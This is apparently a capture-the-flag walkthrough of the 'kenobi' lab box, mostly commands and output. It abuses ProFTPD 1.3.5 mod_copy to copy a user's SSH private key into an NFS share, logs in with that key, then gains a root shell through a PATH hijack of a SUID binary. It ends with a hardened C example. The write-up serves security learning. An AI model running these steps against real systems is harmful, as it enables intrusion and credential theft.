Run nmap to do some recon and gather some info:
$ nmap -vvv -Pn -sCV -p0-65535 --reason -oN kenobi.nmap 10.10.119.248
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-12 17:32 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:32
Completed NSE at 17:32, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 17:32
Completed Parallel DNS resolution of 1 host. at 17:32, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:32
Scanning 10.10.119.248 [65536 ports]
Discovered open port 445/tcp on 10.10.119.248
Discovered open port 111/tcp on 10.10.119.248
Discovered open port 139/tcp on 10.10.119.248
Discovered open port 80/tcp on 10.10.119.248
Discovered open port 22/tcp on 10.10.119.248
Discovered open port 21/tcp on 10.10.119.248
Discovered open port 35627/tcp on 10.10.119.248
Discovered open port 39223/tcp on 10.10.119.248
...
Run nmap smb enum scripts on port 445:
smb-enum-shares
smb-enum-users
$ nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.119.248
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-12 17:35 EST
Nmap scan report for 10.10.119.248
Host is up (0.16s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.119.248\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.119.248\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.119.248\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 24.80 seconds
Connect to the anonymous SMB share with smbclient. Locate any interesting files and download them:
$ smbclient //10.10.119.248/anonymous
Enter WORKGROUP\root password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 06:49:09 2019
.. D 0 Wed Sep 4 06:56:07 2019
log.txt N 12237 Wed Sep 4 06:49:09 2019
9204224 blocks of size 1024. 6877092 blocks available
smb: \> help
? allinfo altname archive backup
blocksize cancel case_sensitive cd chmod
chown close del deltree dir
du echo exit get getfacl
geteas hardlink help history iosize
lcd link lock lowercase ls
l mask md mget mkdir
more mput newer notify open
posix posix_encrypt posix_open posix_mkdir posix_rmdir
posix_unlink posix_whoami print prompt put
pwd q queue quit readlink
rd recurse reget rename reput
rm rmdir showacls setea setmode
scopy stat symlink tar tarmode
timeout translate unlock volume vuid
wdel logon listconnect showconnect tcon
tdis tid utimes logoff ..
!
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (15.2 KiloBytes/sec) (average 15.2 KiloBytes/sec)
smb: \> exit
The log.txt file contains very useful information that can be used later.
Run nmap NFS share scripts on port 111:
nmap.org/nsedoc/scripts/nfs-ls
nmap.org/nsedoc/scripts/nfs-statfs
nmap.org/nsedoc/scripts/nfs-showmount
book.hacktricks.xyz/network-services-pentesting/pentesting-rpcbind
$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.119.248
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-12 17:40 EST
Nmap scan report for 10.10.119.248
Host is up (0.16s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836520.0 6877108.0 22% 16.0T 32000
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
Nmap done: 1 IP address (1 host up) scanned in 2.94 seconds
nfs-showmount reveals that the /var directory is exported to any host (*), so it can be mounted by anyone.
Use netcat with the verbose and telnet options (-vt) to grab the FTP banner:
$ nc -vt 10.10.119.248 21
10.10.119.248: inverse host lookup failed: Unknown host
(UNKNOWN) [10.10.119.248] 21 (ftp) open
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.119.248]
QUIT
221 Goodbye.
The banner shows ProFTPD 1.3.5 Server (default installation).
Use searchsploit to check for vulnerabilities:
$ searchsploit proftpd
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------- ---------------------------------
FreeBSD - 'ftpd / ProFTPd' Remote Command Execution | freebsd/remote/18181.txt
ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Local Overflow | linux/local/394.c
ProFTPd - 'mod_mysql' Authentication Bypass | multiple/remote/8037.txt
ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC) | linux/dos/16129.txt
ProFTPd 1.2 - 'SIZE' Remote Denial of Service | linux/dos/20536.java
ProFTPd 1.2 < 1.3.0 (Linux) - 'sreplace' Remote Buffer Overflow (Metasploit) | linux/remote/16852.rb
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (1) | linux/remote/19475.c
ProFTPd 1.2 pre1/pre2/pre3/pre4/pre5 - Remote Buffer Overflow (2) | linux/remote/19476.c
ProFTPd 1.2 pre6 - 'snprintf' Remote Root | linux/remote/19503.txt
ProFTPd 1.2.0 pre10 - Remote Denial of Service | linux/dos/244.java
ProFTPd 1.2.0 rc2 - Memory Leakage | linux/dos/241.c
ProFTPd 1.2.10 - Remote Users Enumeration | linux/remote/581.c
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force | linux/remote/110.c
ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun | linux/dos/23170.c
ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection | linux/remote/43.pl
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (1) | linux/remote/107.c
ProFTPd 1.2.9 rc2 - '.ASCII' File Remote Code Execution (2) | linux/remote/3021.txt
ProFTPd 1.2.x - 'STAT' Denial of Service | linux/dos/22079.sh
ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection | multiple/remote/32798.pl
ProFTPd 1.3.0 (OpenSUSE) - 'mod_ctrls' Local Stack Overflow | unix/local/10044.pl
ProFTPd 1.3.0 - 'sreplace' Remote Stack Overflow (Metasploit) | linux/remote/2856.pm
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) | linux/local/3330.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) | linux/local/3333.pl
ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow | linux/local/3730.txt
ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) | linux/dos/2928.py
ProFTPd 1.3.2 rc3 < 1.3.3b (FreeBSD) - Telnet IAC Buffer Overflow (Metasploit) | linux/remote/16878.rb
ProFTPd 1.3.2 rc3 < 1.3.3b (Linux) - Telnet IAC Buffer Overflow (Metasploit) | linux/remote/16851.rb
ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution | linux/remote/15662.txt
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit) | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2) | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
ProFTPD 1.3.7a - Remote Denial of Service | multiple/dos/49697.py
ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow | linux/remote/4312.c
ProFTPd IAC 1.3.x - Remote Command Execution | linux/remote/15449.pl
ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) | linux/remote/16921.rb
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (1) | linux/remote/19086.c
WU-FTPD 2.4.2 / SCO Open Server 5.0.5 / ProFTPd 1.2 pre1 - 'realpath' Remote Buffer Overflow (2) | linux/remote/19087.c
WU-FTPD 2.4/2.5/2.6 / Trolltech ftpd 1.2 / ProFTPd 1.2 / BeroFTPD 1.3.4 FTP - glob Expansion | linux/remote/20690.sh
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Several other entries could be researched and tested, but "ProFTPd 1.3.5 - File Copy" looks very interesting.
ProFTPd 1.3.5 - File Copy
Based on the info in log.txt and the File Copy vulnerability (mod_copy's SITE CPFR/CPTO commands are accepted without logging in), connect to FTP and copy kenobi's id_rsa (SSH key) into the NFS-exported /var directory:
$ nc 10.10.119.248 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.119.248]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
QUIT
221 Goodbye.
Create a mount point and mount the /var export. Copy the SSH key to your machine and restrict its permissions:
$ mkdir /mnt/kenobi
$ mount 10.10.119.248:/var /mnt/kenobi
$ ls -la /mnt/kenobi
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 4 root root 4096 Jan 12 17:54 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 12 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 26 2019 mail
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 29 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Jan 12 17:53 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www
$ cp /mnt/kenobi/tmp/id_rsa .
$ chmod 600 id_rsa
Use ssh with the id_rsa file to log in as kenobi:
$ ssh -i id_rsa kenobi@10.10.119.248
The authenticity of host '10.10.119.248 (10.10.119.248)' cannot be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.119.248' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ cd /home/kenobi/
kenobi@kenobi:~$ ls
share user.txt
Some commands to find SUID-enabled files:
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
Run one of them and see what's available:
kenobi@kenobi:~$ find / -perm -u=s -type f 2>/dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/usr/bin/menu looks interesting and a little out of place. Use strings to get some info about the binary:
kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
Invalid choice
...
Run menu and compare its output with the commands found by strings; they are the same:
kenobi@kenobi:~$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2022 21:16:05 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:~$ curl -I localhost
HTTP/1.1 200 OK
Date: Sun, 25 Sep 2022 21:16:25 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT
ETag: "c8-591b6884b6ed2"
Accept-Ranges: bytes
Content-Length: 200
Vary: Accept-Encoding
Content-Type: text/html
kenobi@kenobi:~$ menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic
kenobi@kenobi:~$ uname -r
4.8.0-58-generic
kenobi@kenobi:~$
The problem is that menu calls these commands (curl, uname, ifconfig) by bare name rather than by absolute path, so they are resolved through the caller's PATH. Since menu is SUID root, you can place your own uname in /tmp, put /tmp at the front of PATH, and menu will run your copy as root.
kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/bash > uname
kenobi@kenobi:/tmp$ chmod 777 uname
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@kenobi:/tmp#
You became root with bash. Exit and try again with sh:
root@kenobi:/tmp# exit
exit
kenobi@kenobi:/tmp$ rm -rf uname
kenobi@kenobi:/tmp$ echo /bin/sh > uname
kenobi@kenobi:/tmp$ chmod 777 uname
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
# whoami
root
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
# exit
kenobi@kenobi:/tmp$
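For contrast, here is how a menu launcher like this should have been written. This is an added example, not the /usr/bin/menu binary from the box: every entry is a fixed absolute path run with execve() and a fixed environment, so neither a shell nor the caller's PATH is consulted. The command paths are assumptions for an Ubuntu 16.04 layout.

```c
/* Hardened menu launcher: added example, not the box's /usr/bin/menu.
 * Commands are absolute paths executed with execve() under a fixed
 * environment, so the invoking user's PATH can never redirect them.
 * Paths below are assumed for an Ubuntu 16.04 layout. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

struct cmd { const char *label; const char *const argv[4]; };

static const struct cmd MENU[] = {
    { "status check",   { "/usr/bin/curl", "-I", "localhost", NULL } },
    { "kernel version", { "/bin/uname", "-r", NULL } },
    { "ifconfig",       { "/sbin/ifconfig", NULL } },
};
#define NCMD (sizeof MENU / sizeof MENU[0])

/* Fixed child environment: the caller's PATH (e.g. /tmp:...) never reaches it. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* argv for a 1-based menu choice, or NULL when the choice is out of range. */
const char *const *command_for_choice(int choice) {
    if (choice < 1 || choice > (int)NCMD) return NULL;
    return MENU[choice - 1].argv;
}

/* Self-check: a bare name here would again be resolved through PATH. */
int all_paths_absolute(void) {
    for (size_t i = 0; i < NCMD; i++)
        if (MENU[i].argv[0][0] != '/') return 0;
    return 1;
}

/* Fork and execve() the chosen command; returns its exit status. */
int run_choice(int choice) {
    const char *const *argv = command_for_choice(choice);
    if (argv == NULL) { puts("Invalid choice"); return 1; }
    pid_t pid = fork();
    if (pid < 0) return 1;
    if (pid == 0) {
        execve(argv[0], (char *const *)argv, SAFE_ENV); /* no PATH search */
        _exit(127);                                      /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return 1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : 1;
}

int main(void) {
    int choice = 0;
    for (size_t i = 0; i < NCMD; i++) printf("%zu. %s\n", i + 1, MENU[i].label);
    printf("** Enter your choice :");
    return scanf("%d", &choice) == 1 ? run_choice(choice) : 1;
}
```

Even with absolute paths, a setuid binary that shells out through system() would still inherit the caller's environment (IFS, LD_* variables are ignored for setuid programs, but PATH is not), which is why the child here gets SAFE_ENV rather than the inherited environ.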